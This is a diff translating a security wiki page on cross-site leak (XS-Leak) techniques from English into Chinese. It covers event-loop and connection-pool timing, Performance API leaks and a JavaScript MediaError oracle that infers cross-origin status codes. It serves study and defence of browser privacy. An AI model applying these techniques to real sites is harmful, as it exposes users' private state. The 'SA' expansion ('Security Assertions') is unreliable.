-JavaScript operates on a [single-threaded event loop](https://developer.mozilla.org/en-US/docs/Web/JavaScript/EventLoop) concurrency model, signifying that **it can only execute one task at a time**. This characteristic can be exploited to gauge **how long code from a different origin takes to execute**. An attacker can measure the execution time of their own code in the event loop by continuously dispatching events with fixed properties. These events will be processed when the event pool is empty. If other origins are also dispatching events to the same pool, an **attacker can infer the time it takes for these external events to execute by observing delays in the execution of their own tasks**. This method of monitoring the event loop for delays can reveal the execution time of code from different origins, potentially exposing sensitive information.
+JavaScript 在 [单线程事件循环](https://developer.mozilla.org/en-US/docs/Web/JavaScript/EventLoop) 并发模型上运行，这意味着**它一次只能执行一个任务**。这一特性可以被利用来评估**来自不同源的代码执行所需的时间**。攻击者可以通过不断调度具有固定属性的事件来测量其代码在事件循环中的执行时间。这些事件将在事件池为空时被处理。如果其他源也在向同一池调度事件，攻击者可以通过观察自己任务执行的延迟来推断这些外部事件执行所需的时间。这种监控事件循环延迟的方法可以揭示来自不同源的代码的执行时间，可能暴露敏感信息。
 
 > [!WARNING]
-> In an execution timing it's possible to **eliminate** **network factors** to obtain **more precise measurements**. For example, by loading the resources used by the page before loading it.
+> 在执行计时中，可以**消除** **网络因素**以获得**更精确的测量**。例如，通过在加载页面之前加载页面使用的资源。
 
-### Busy Event Loop <a href="#busy-event-loop" id="busy-event-loop"></a>
+### 忙碌事件循环 <a href="#busy-event-loop" id="busy-event-loop"></a>
 
-- **Inclusion Methods**:
-- **Detectable Difference**: Timing (generally due to Page Content, Status Code)
-- **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#busy-event-loop](https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#busy-event-loop)
-- **Summary:** One method to measure the execution time of a web operation involves intentionally blocking the event loop of a thread and then timing **how long it takes for the event loop to become available again**. By inserting a blocking operation (such as a long computation or a synchronous API call) into the event loop, and monitoring the time it takes for subsequent code to begin execution, one can infer the duration of the tasks that were executing in the event loop during the blocking period. This technique leverages the single-threaded nature of JavaScript's event loop, where tasks are executed sequentially, and can provide insights into the performance or behavior of other operations sharing the same thread.
-- **Code Example**:
+- **包含方法**:
+- **可检测差异**: 时间（通常由于页面内容、状态码）
+- **更多信息**: [https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#busy-event-loop](https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#busy-event-loop)
+- **总结**: 测量网页操作执行时间的一种方法是故意阻塞线程的事件循环，然后计时**事件循环再次可用所需的时间**。通过在事件循环中插入一个阻塞操作（例如长时间计算或同步 API 调用），并监控后续代码开始执行所需的时间，可以推断出在阻塞期间事件循环中执行的任务的持续时间。这种技术利用了 JavaScript 事件循环的单线程特性，其中任务是按顺序执行的，并且可以提供对共享同一线程的其他操作的性能或行为的洞察。
+- **代码示例**:
 
-A significant advantage of the technique of measuring execution time by locking the event loop is its potential to circumvent **Site Isolation**. **Site Isolation** is a security feature that separates different websites into separate processes, aiming to prevent malicious sites from directly accessing sensitive data from other sites. However, by influencing the execution timing of another origin through the shared event loop, an attacker can indirectly extract information about that origin's activities. This method does not rely on direct access to the other origin's data but rather observes the impact of that origin's activities on the shared event loop, thus evading the protective barriers established by **Site Isolation**.
+通过锁定事件循环来测量执行时间的技术的一个显著优势是其潜在的绕过**站点隔离**。**站点隔离**是一种安全功能，将不同网站分隔到不同的进程中，旨在防止恶意网站直接访问其他网站的敏感数据。然而，通过通过共享事件循环影响另一个源的执行时机，攻击者可以间接提取有关该源活动的信息。这种方法不依赖于直接访问其他源的数据，而是观察该源活动对共享事件循环的影响，从而规避**站点隔离**建立的保护屏障。
 
 > [!WARNING]
-> In an execution timing it's possible to **eliminate** **network factors** to obtain **more precise measurements**. For example, by loading the resources used by the page before loading it.
+> 在执行计时中，可以**消除** **网络因素**以获得**更精确的测量**。例如，通过在加载页面之前加载页面使用的资源。
 
-### Connection Pool
+### 连接池
 
-- **Inclusion Methods**: JavaScript Requests
-- **Detectable Difference**: Timing (generally due to Page Content, Status Code)
-- **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/](https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/)
-- **Summary:** An attacker could lock all the sockets except 1, load the target web and at the same time load another page, the time until the last page is starting to load is the time the target page took to load.
-- **Code Example**:
+- **包含方法**: JavaScript 请求
+- **可检测差异**: 时间（通常由于页面内容、状态码）
+- **更多信息**: [https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/](https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/)
+- **总结**: 攻击者可以锁定所有套接字，除了 1 个，加载目标网页，同时加载另一个页面，最后一个页面开始加载的时间就是目标页面加载所需的时间。
+- **代码示例**:
 
 {{#ref}}
 connection-pool-example.md
 {{#endref}}
 
-Browsers utilize sockets for server communication, but due to the limited resources of the operating system and hardware, **browsers are compelled to impose a limit** on the number of concurrent sockets. Attackers can exploit this limitation through the following steps:
+浏览器利用套接字进行服务器通信，但由于操作系统和硬件的资源有限，**浏览器被迫对**并发套接字的数量施加限制。攻击者可以通过以下步骤利用这一限制：
 
-1. Ascertain the browser's socket limit, for instance, 256 global sockets.
-2. Occupy 255 sockets for an extended duration by initiating 255 requests to various hosts, designed to keep the connections open without completing.
-3. Employ the 256th socket to send a request to the target page.
-4. Attempt a 257th request to a different host. Given that all sockets are in use (as per steps 2 and 3), this request will be queued until a socket becomes available. The delay before this request proceeds provides the attacker with timing information about the network activity related to the 256th socket (the target page's socket). This inference is possible because the 255 sockets from step 2 are still engaged, implying that any newly available socket must be the one released from step 3. The time taken for the 256th socket to become available is thus directly linked to the time required for the request to the target page to complete.
+1. 确定浏览器的套接字限制，例如，256 个全局套接字。
+2. 通过向不同主机发起 255 个请求，长时间占用 255 个套接字，旨在保持连接开放而不完成。
+3. 使用第 256 个套接字向目标页面发送请求。
+4. 尝试向不同主机发起第 257 个请求。由于所有套接字都在使用中（根据步骤 2 和 3），该请求将被排队，直到有套接字可用。此请求进行之前的延迟为攻击者提供了与第 256 个套接字（目标页面的套接字）相关的网络活动的时间信息。这种推断是可能的，因为步骤 2 中的 255 个套接字仍在使用，这意味着任何新可用的套接字必须是从步骤 3 中释放的。第 256 个套接字变得可用所需的时间因此直接与请求完成所需的时间相关联。
 
-For more info: [https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/](https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/)
+有关更多信息: [https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/](https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/)
 
-### Connection Pool by Destination
+### 按目标的连接池
 
-- **Inclusion Methods**: JavaScript Requests
-- **Detectable Difference**: Timing (generally due to Page Content, Status Code)
-- **More info**:
-- **Summary:** It's like the previous technique but instead of using all the sockets, Google **Chrome** puts a limit of **6 concurrent request to the same origin**. If we **block 5** and then **launch a 6th** request we can **time** it and if we managed to make the **victim page send** more **requests** to the same endpoint to detect a **status** of the **page**, the **6th request** will take **longer** and we can detect it.
+- **包含方法**: JavaScript 请求
+- **可检测差异**: 时间（通常由于页面内容、状态码）
+- **更多信息**:
+- **总结**: 这与前一种技术类似，但 Google **Chrome** 对**同一源的并发请求**设置了**6 个限制**。如果我们**阻塞 5**，然后**发起第 6** 个请求，我们可以**计时**，如果我们设法让**受害者页面发送**更多**请求**到同一端点以检测页面的**状态**，第 **6** 个请求将需要**更长时间**，我们可以检测到它。
 
-## Performance API Techniques
+## 性能 API 技术
 
-The [`Performance API`](https://developer.mozilla.org/en-US/docs/Web/API/Performance) offers insights into the performance metrics of web applications, further enriched by the [`Resource Timing API`](https://developer.mozilla.org/en-US/docs/Web/API/Resource_Timing_API). The Resource Timing API enables the monitoring of detailed network request timings, such as the duration of the requests. Notably, when servers include the `Timing-Allow-Origin: *` header in their responses, additional data like the transfer size and domain lookup time becomes available.
+[`性能 API`](https://developer.mozilla.org/en-US/docs/Web/API/Performance) 提供了对 Web 应用程序性能指标的洞察，进一步通过 [`资源计时 API`](https://developer.mozilla.org/en-US/docs/Web/API/Resource_Timing_API) 得到增强。资源计时 API 使监控详细的网络请求时长成为可能，例如请求的持续时间。值得注意的是，当服务器在其响应中包含 `Timing-Allow-Origin: *` 头时，诸如传输大小和域查找时间等额外数据将变得可用。
 
-This wealth of data can be retrieved via methods like [`performance.getEntries`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/getEntries) or [`performance.getEntriesByName`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/getEntriesByName), providing a comprehensive view of performance-related information. Additionally, the API facilitates the measurement of execution times by calculating the difference between timestamps obtained from [`performance.now()`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/now). However, it's worth noting that for certain operations in browsers like Chrome, the precision of `performance.now()` may be limited to milliseconds, which could affect the granularity of timing measurements.
+这些丰富的数据可以通过 [`performance.getEntries`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/getEntries) 或 [`performance.getEntriesByName`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/getEntriesByName) 等方法检索，提供全面的性能相关信息。此外，API 通过计算从 [`performance.now()`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/now) 获取的时间戳之间的差异来测量执行时间。然而，值得注意的是，对于某些在 Chrome 等浏览器中的操作，`performance.now()` 的精度可能仅限于毫秒，这可能影响计时测量的粒度。
 
-Beyond timing measurements, the Performance API can be leveraged for security-related insights. For instance, the presence or absence of pages in the `performance` object in Chrome can indicate the application of `X-Frame-Options`. Specifically, if a page is blocked from rendering in a frame due to `X-Frame-Options`, it will not be recorded in the `performance` object, providing a subtle clue about the page's framing policies.
+除了计时测量外，性能 API 还可以用于安全相关的洞察。例如，Chrome 中 `performance` 对象中页面的存在或缺失可以指示 `X-Frame-Options` 的应用。具体来说，如果由于 `X-Frame-Options` 而阻止页面在框架中呈现，则该页面将不会记录在 `performance` 对象中，从而提供有关页面框架策略的微妙线索。
 
-### Error Leak
+### 错误泄露
 
-- **Inclusion Methods**: Frames, HTML Elements
-- **Detectable Difference**: Status Code
-- **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
-- **Summary:** A request that results in errors will not create a resource timing entry.
-- **Code Example**: [https://xsinator.com/testing.html#Performance%20API%20Error%20Leak](https://xsinator.com/testing.html#Performance%20API%20Error%20Leak)
+- **包含方法**: Frames, HTML 元素
+- **可检测差异**: 状态码
+- **更多信息**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
+- **总结**: 导致错误的请求不会创建资源计时条目。
+- **代码示例**: [https://xsinator.com/testing.html#Performance%20API%20Error%20Leak](https://xsinator.com/testing.html#Performance%20API%20Error%20Leak)
 
-It is possible to **differentiate between HTTP response status codes** because requests that lead to an **error** do **not create a performance entry**.
+可以**区分 HTTP 响应状态码**，因为导致**错误**的请求**不会创建性能条目**。
 
-### Style Reload Error
+### 样式重载错误
 
-- **Inclusion Methods**: HTML Elements
-- **Detectable Difference**: Status Code
-- **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
-- **Summary:** Due to a browser bug, requests that result in errors are loaded twice.
-- **Code Example**: [https://xsinator.com/testing.html#Style%20Reload%20Error%20Leak](https://xsinator.com/testing.html#Style%20Reload%20Error%20Leak)
+- **包含方法**: HTML 元素
+- **可检测差异**: 状态码
+- **更多信息**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
+- **总结**: 由于浏览器错误，导致错误的请求会被加载两次。
+- **代码示例**: [https://xsinator.com/testing.html#Style%20Reload%20Error%20Leak](https://xsinator.com/testing.html#Style%20Reload%20Error%20Leak)
 
-In the previous technique it was also identified two cases where browser bugs in GC lead to **resources being loaded twice when they fail to load**. This will result in multiple entries in the Performance API and can thus be detected.
+在前一种技术中，还识别出浏览器 GC 中的两个案例，导致**资源在加载失败时被加载两次**。这将导致性能 API 中出现多个条目，从而可以被检测到。
 
-### Request Merging Error
+### 请求合并错误
 
-- **Inclusion Methods**: HTML Elements
-- **Detectable Difference**: Status Code
-- **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
-- **Summary:** Requests that result in an error can not be merged.
-- **Code Example**: [https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak](https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak)
+- **包含方法**: HTML 元素
+- **可检测差异**: 状态码
+- **更多信息**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
+- **总结**: 导致错误的请求无法合并。
+- **代码示例**: [https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak](https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak)
 
-The technique was found in a table in the mentioned paper but no description of the technique was found on it. However, you can find the source code checking for it in [https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak](https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak)
+该技术在提到的论文中的表格中被发现，但没有找到该技术的描述。然而，你可以在 [https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak](https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak) 中检查源代码。
 
-### Empty Page Leak
+### 空页面泄露
 
-- **Inclusion Methods**: Frames
-- **Detectable Difference**: Page Content
-- **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
-- **Summary:** Empty responses do not create resource timing entries.
-- **Code Example**: [https://xsinator.com/testing.html#Performance%20API%20Empty%20Page%20Leak](https://xsinator.com/testing.html#Performance%20API%20Empty%20Page%20Leak)
+- **包含方法**: Frames
+- **可检测差异**: 页面内容
+- **更多信息**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
+- **总结**: 空响应不会创建资源计时条目。
+- **代码示例**: [https://xsinator.com/testing.html#Performance%20API%20Empty%20Page%20Leak](https://xsinator.com/testing.html#Performance%20API%20Empty%20Page%20Leak)
 
-An attacker can detect if a request resulted in an empty HTTP response body because e**mpty pages do not create a performance entry in some browsers**.
+攻击者可以检测请求是否导致空 HTTP 响应体，因为**空页面在某些浏览器中不会创建性能条目**。
 
-### **XSS-Auditor Leak**
+### **XSS-Auditor 泄露**
 
-- **Inclusion Methods**: Frames
-- **Detectable Difference**: Page Content
-- **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
-- **Summary:** Using the XSS Auditor in Security Assertions, attackers can detect specific webpage elements by observing alterations in responses when crafted payloads trigger the auditor's filtering mechanism.
-- **Code Example**: [https://xsinator.com/testing.html#Performance%20API%20XSS%20Auditor%20Leak](https://xsinator.com/testing.html#Performance%20API%20XSS%20Auditor%20Leak)
+- **包含方法**: Frames
+- **可检测差异**: 页面内容
+- **更多信息**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
+- **总结**: 在安全声明中使用 XSS 审计器，攻击者可以通过观察当构造的有效负载触发审计器的过滤机制时响应的变化来检测特定网页元素。
+- **代码示例**: [https://xsinator.com/testing.html#Performance%20API%20XSS%20Auditor%20Leak](https://xsinator.com/testing.html#Performance%20API%20XSS%20Auditor%20Leak)
 
-In Security Assertions (SA), the XSS Auditor, originally intended to prevent Cross-Site Scripting (XSS) attacks, can paradoxically be exploited to leak sensitive information. Although this built-in feature was removed from Google Chrome (GC), it's still present in SA. In 2013, Braun and Heiderich demonstrated that the XSS Auditor could inadvertently block legitimate scripts, leading to false positives. Building on this, researchers developed techniques to extract information and detect specific content on cross-origin pages, a concept known as XS-Leaks, initially reported by Terada and elaborated by Heyes in a blog post. Although these techniques were specific to the XSS Auditor in GC, it was discovered that in SA, pages blocked by the XSS Auditor do not generate entries in the Performance API, revealing a method through which sensitive information might still be leaked.
+在安全声明 (SA) 中，XSS 审计器最初旨在防止跨站脚本 (XSS) 攻击，但可以悖论地被利用来泄露敏感信息。尽管此内置功能已从 Google Chrome (GC) 中移除，但在 SA 中仍然存在。2013 年，Braun 和 Heiderich 证明 XSS 审计器可能会意外阻止合法脚本，导致误报。在此基础上，研究人员开发了提取信息和检测跨源页面特定内容的技术，这一概念被称为 XS-Leaks，最初由 Terada 报告，并由 Heyes 在博客文章中详细阐述。尽管这些技术特定于 GC 中的 XSS 审计器，但发现 SA 中被 XSS 审计器阻止的页面不会在性能 API 中生成条目，从而揭示了一种可能泄露敏感信息的方法。
 
-### X-Frame Leak
+### X-Frame 泄露
 
-- **Inclusion Methods**: Frames
-- **Detectable Difference**: Header
-- **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2), [https://xsleaks.github.io/xsleaks/examples/x-frame/index.html](https://xsleaks.github.io/xsleaks/examples/x-frame/index.html), [https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-x-frame-options](https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-x-frame-options)
-- **Summary:** Resource with X-Frame-Options header does not create resource timing entry.
-- **Code Example**: [https://xsinator.com/testing.html#Performance%20API%20X-Frame%20Leak](https://xsinator.com/testing.html#Performance%20API%20X-Frame%20Leak)
+- **包含方法**: Frames
+- **可检测差异**: 头部
+- **更多信息**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2), [https://xsleaks.github.io/xsleaks/examples/x-frame/index.html](https://xsleaks.github.io/xsleaks/examples/x-frame/index.html), [https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-x-frame-options](https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-x-frame-options)
+- **总结**: 带有 X-Frame-Options 头的资源不会创建资源计时条目。
+- **代码示例**: [https://xsinator.com/testing.html#Performance%20API%20X-Frame%20Leak](https://xsinator.com/testing.html#Performance%20API%20X-Frame%20Leak)
 
-If a page is **not allowed** to be **rendered** in an **iframe** it does **not create a performance entry**. As a result, an attacker can detect the response header **`X-Frame-Options`**.\
-Same happens if you use an **embed** **tag.**
+如果页面**不允许**在**iframe**中**呈现**，则不会**创建性能条目**。因此，攻击者可以检测响应头 **`X-Frame-Options`**。\
+使用**embed** **标签**时也是如此。
 
-### Download Detection
+### 下载检测
 
-- **Inclusion Methods**: Frames
-- **Detectable Difference**: Header
-- **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
-- **Summary:** Downloads do not create resource timing entries in the Performance API.
-- **Code Example**: [https://xsinator.com/testing.html#Performance%20API%20Download%20Detection](https://xsinator.com/testing.html#Performance%20API%20Download%20Detection)
+- **包含方法**: Frames
+- **可检测差异**: 头部
+- **更多信息**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
+- **总结**: 下载不会在性能 API 中创建资源计时条目。
+- **代码示例**: [https://xsinator.com/testing.html#Performance%20API%20Download%20Detection](https://xsinator.com/testing.html#Performance%20API%20Download%20Detection)
 
-Similar, to the XS-Leak described, a **resource that is downloaded** because of the ContentDisposition header, also does **not create a performance entry**. This technique works in all major browsers.
+与描述的 XS-Leak 类似，由于 ContentDisposition 头，**被下载的资源**也**不会创建性能条目**。此技术在所有主要浏览器中均有效。
 
-### Redirect Start Leak
+### 重定向开始泄露
 
-- **Inclusion Methods**: Frames
-- **Detectable Difference**: Redirect
-- **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
-- **Summary:** Resource timing entry leaks the start time of a redirect.
-- **Code Example**: [https://xsinator.com/testing.html#Redirect%20Start%20Leak](https://xsinator.com/testing.html#Redirect%20Start%20Leak)
+- **包含方法**: Frames
+- **可检测差异**: 重定向
+- **更多信息**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
+- **总结**: 资源计时条目泄露重定向的开始时间。
+- **代码示例**: [https://xsinator.com/testing.html#Redirect%20Start%20Leak](https://xsinator.com/testing.html#Redirect%20Start%20Leak)
 
-We found one XS-Leak instance that abuses the behavior of some browsers which log too much information for cross-origin requests. The standard defines a subset of attributes that should be set to zero for cross-origin resources. However, in **SA** it is possible to detect if the user is **redirected** by the target page, by querying the **Performance API** and checking for the **redirectStart timing data**.
+我们发现一个 XS-Leak 实例，利用某些浏览器记录过多跨源请求信息的行为。标准定义了一组应为跨源资源设置为零的属性。然而，在**SA**中，可以通过查询**性能 API**并检查**redirectStart 计时数据**来检测用户是否被目标页面**重定向**。
 
-### Duration Redirect Leak
+### 持续时间重定向泄露
 
-- **Inclusion Methods**: Fetch API
-- **Detectable Difference**: Redirect
-- **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
-- **Summary:** The duration of timing entries is negative when a redirect occurs.
-- **Code Example**: [https://xsinator.com/testing.html#Duration%20Redirect%20Leak](https://xsinator.com/testing.html#Duration%20Redirect%20Leak)
+- **包含方法**: Fetch API
+- **可检测差异**: 重定向
+- **更多信息**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
+- **总结**: 当发生重定向时，计时条目的持续时间为负。
+- **代码示例**: [https://xsinator.com/testing.html#Duration%20Redirect%20Leak](https://xsinator.com/testing.html#Duration%20Redirect%20Leak)
 
-In GC, the **duration** for requests that result in a **redirect** is **negative** and can thus be **distinguished** from requests that do not result in a redirect.
+在 GC 中，导致**重定向**的请求的**持续时间**为**负**，因此可以与不导致重定向的请求**区分**开来。
 
-### CORP Leak
+### CORP 泄露
 
-- **Inclusion Methods**: Frames
-- **Detectable Difference**: Header
-- **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
-- **Summary:** Resource protected with CORP do not create resource timing entries.
-- **Code Example**: [https://xsinator.com/testing.html#Performance%20API%20CORP%20Leak](https://xsinator.com/testing.html#Performance%20API%20CORP%20Leak)
+- **包含方法**: Frames
+- **可检测差异**: 头部
+- **更多信息**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
+- **总结**: 受 CORP 保护的资源不会创建资源计时条目。
+- **代码示例**: [https://xsinator.com/testing.html#Performance%20API%20CORP%20Leak](https://xsinator.com/testing.html#Performance%20API%20CORP%20Leak)
 
-In some cases, the **nextHopProtocol entry** can be used as a leak technique. In GC, when the **CORP header** is set, the nextHopProtocol will be **empty**. Note that SA will not create a performance entry at all for CORP-enabled resources.
+在某些情况下，**nextHopProtocol 条目**可以用作泄露技术。在 GC 中，当设置**CORP 头**时，nextHopProtocol 将是**空的**。请注意，SA 对于启用 CORP 的资源根本不会创建性能条目。
 
-### Service Worker
+### 服务工作者
 
-- **Inclusion Methods**: Frames
-- **Detectable Difference**: API Usage
-- **More info**: [https://www.ndss-symposium.org/ndss-paper/awakening-the-webs-sleeper-agents-misusing-service-workers-for-privacy-leakage/](https://www.ndss-symposium.org/ndss-paper/awakening-the-webs-sleeper-agents-misusing-service-workers-for-privacy-leakage/)
-- **Summary:** Detect if a service worker is registered for a specific origin.
-- **Code Example**:
+- **包含方法**: Frames
+- **可检测差异**: API 使用
+- **更多信息**: [https://www.ndss-symposium.org/ndss-paper/awakening-the-webs-sleeper-agents-misusing-service-workers-for-privacy-leakage/](https://www.ndss-symposium.org/ndss-paper/awakening-the-webs-sleeper-agents-misusing-service-workers-for-privacy-leakage/)
+- **总结**: 检测特定源是否注册了服务工作者。
+- **代码示例**:
 
-Service workers are event-driven script contexts that run at an origin. They run in the background of a web page and can intercept, modify, and **cache resources** to create offline web application.\
-If a **resource cached** by a **service worker** is accessed via **iframe**, the resource will be **loaded from the service worker cache**.\
-To detect if the resource was **loaded from the service worker** cache the **Performance API** can be used.\
-This could also be done with a Timing attack (check the paper for more info).
+服务工作者是事件驱动的脚本上下文，在一个源上运行。它们在网页的后台运行，可以拦截、修改和**缓存资源**以创建离线 Web 应用程序。\
+如果通过**iframe**访问**服务工作者**缓存的**资源**，该资源将从**服务工作者缓存**中**加载**。\
+要检测资源是否**从服务工作者**缓存中加载，可以使用**性能 API**。\
+这也可以通过计时攻击来完成（有关更多信息，请查看论文）。
 
-### Cache
+### 缓存
 
-- **Inclusion Methods**: Fetch API
-- **Detectable Difference**: Timing
-- **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-cached-resources](https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-cached-resources)
-- **Summary:** It is possible to check if a resource was stored in the cache.
-- **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-cached-resources](https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-cached-resources), [https://xsinator.com/testing.html#Cache%20Leak%20(POST)](<https://xsinator.com/testing.html#Cache%20Leak%20(POST)>)
+- **包含方法**: Fetch API
+- **可检测差异**: 时间
+- **更多信息**: [https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-cached-resources](https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-cached-resources)
+- **总结**: 可以检查资源是否存储在缓存中。
+- **代码示例**: [https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-cached-resources](https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-cached-resources), [https://xsinator.com/testing.html#Cache%20Leak%20(POST)](<https://xsinator.com/testing.html#Cache%20Leak%20(POST)>)
 
-Using the [Performance API](./#performance-api) it's possible to check if a resource is cached.
+使用 [性能 API](./#performance-api) 可以检查资源是否被缓存。
 
-### Network Duration
+### 网络持续时间
 
-- **Inclusion Methods**: Fetch API
-- **Detectable Difference**: Page Content
-- **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#network-duration](https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#network-duration)
-- **Summary:** It is possible to retrieve the network duration of a request from the `performance` API.
-- **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#network-duration](https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#network-duration)
+- **包含方法**: Fetch API
+- **可检测差异**: 页面内容
+- **更多信息**: [https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#network-duration](https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#network-duration)
+- **总结**: 可以从 `performance` API 中检索请求的网络持续时间。
+- **代码示例**: [https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#network-duration](https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#network-duration)
 
-## Error Messages Technique
+## 错误消息技术
 
-### Media Error
-
-- **Inclusion Methods**: HTML Elements (Video, Audio)
-- **Detectable Difference**: Status Code
-- **More info**: [https://bugs.chromium.org/p/chromium/issues/detail?id=828265](https://bugs.chromium.org/p/chromium/issues/detail?id=828265)
-- **Summary:** In Firefox is possible to accurately leak a cross-origin request’s status code.
-- **Code Example**: [https://jsbin.com/nejatopusi/1/edit?html,css,js,output](https://jsbin.com/nejatopusi/1/edit?html,css,js,output)
+### 媒体错误
 
+- **包含方法**: HTML 元素 (视频, 音频)
+- **可检测差异**: 状态码
+- **更多信息**: [https://bugs.chromium.org/p/chromium/issues/detail?id=828265](https://bugs.chromium.org/p/chromium/issues/detail?id=828265)
+- **总结**: 在 Firefox 中，可以准确泄露跨源请求的状态码。
+- **代码示例**: [https://jsbin.com/nejatopusi/1/edit?html,css,js,output](https://jsbin.com/nejatopusi/1/edit?html,css,js,output)
 ```javascript
 // Code saved here in case it dissapear from the link
 // Based on MDN MediaError example: https://mdn.github.io/dom-examples/media/mediaerror/
 window.addEventListener("load", startup, false)
 function displayErrorMessage(msg) {
-  document.getElementById("log").innerHTML += msg
+document.getElementById("log").innerHTML += msg
 }
 
 function startup() {
-  let audioElement = document.getElementById("audio")
-  // "https://mdn.github.io/dom-examples/media/mediaerror/assets/good.mp3";
-  document.getElementById("startTest").addEventListener(
-    "click",
-    function () {
-      audioElement.src = document.getElementById("testUrl").value
-    },
-    false
-  )
-  // Create the event handler
-  var errHandler = function () {
-    let err = this.error
-    let message = err.message
-    let status = ""
+let audioElement = document.getElementById("audio")
+// "https://mdn.github.io/dom-examples/media/mediaerror/assets/good.mp3";
+document.getElementById("startTest").addEventListener(
+"click",
+function () {
+audioElement.src = document.getElementById("testUrl").value
+},
+false
+)
+// Create the event handler
+var errHandler = function () {
+let err = this.error
+let message = err.message
+let status = ""
 
-    // Chrome error.message when the request loads successfully: "DEMUXER_ERROR_COULD_NOT_OPEN: FFmpegDemuxer: open context failed"
-    // Firefox error.message when the request loads successfully: "Failed to init decoder"
-    if (
-      message.indexOf("DEMUXER_ERROR_COULD_NOT_OPEN") != -1 ||
-      message.indexOf("Failed to init decoder") != -1
-    ) {
-      status = "Success"
-    } else {
-      status = "Error"
-    }
-    displayErrorMessage(
-      "<strong>Status: " +
-        status +
-        "</strong> (Error code:" +
-        err.code +
-        " / Error Message: " +
-        err.message +
-        ")<br>"
-    )
-  }
-  audioElement.onerror = errHandler
+// Chrome error.message when the request loads successfully: "DEMUXER_ERROR_COULD_NOT_OPEN: FFmpegDemuxer: open context failed"
+// Firefox error.message when the request loads successfully: "Failed to init decoder"
+if (
+message.indexOf("DEMUXER_ERROR_COULD_NOT_OPEN") != -1 ||
+message.indexOf("Failed to init decoder") != -1
+) {
+status = "Success"
+} else {
+status = "Error"
+}
+displayErrorMessage(
+"<strong>Status: " +
+status +
+"</strong> (Error code:" +
+err.code +
+" / Error Message: " +
+err.message +
+")<br>"
+)
+}
+audioElement.onerror = errHandler
 }
 ```
+`MediaError` 接口的 message 属性通过一个独特的字符串唯一标识成功加载的资源。攻击者可以通过观察消息内容来利用此特性，从而推断跨源资源的响应状态。
 
-The `MediaError` interface's message property uniquely identifies resources that load successfully with a distinct string. An attacker can exploit this feature by observing the message content, thereby deducing the response status of a cross-origin resource.
+### CORS 错误
 
-### CORS Error
+- **包含方法**: Fetch API
+- **可检测差异**: Header
+- **更多信息**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.3)
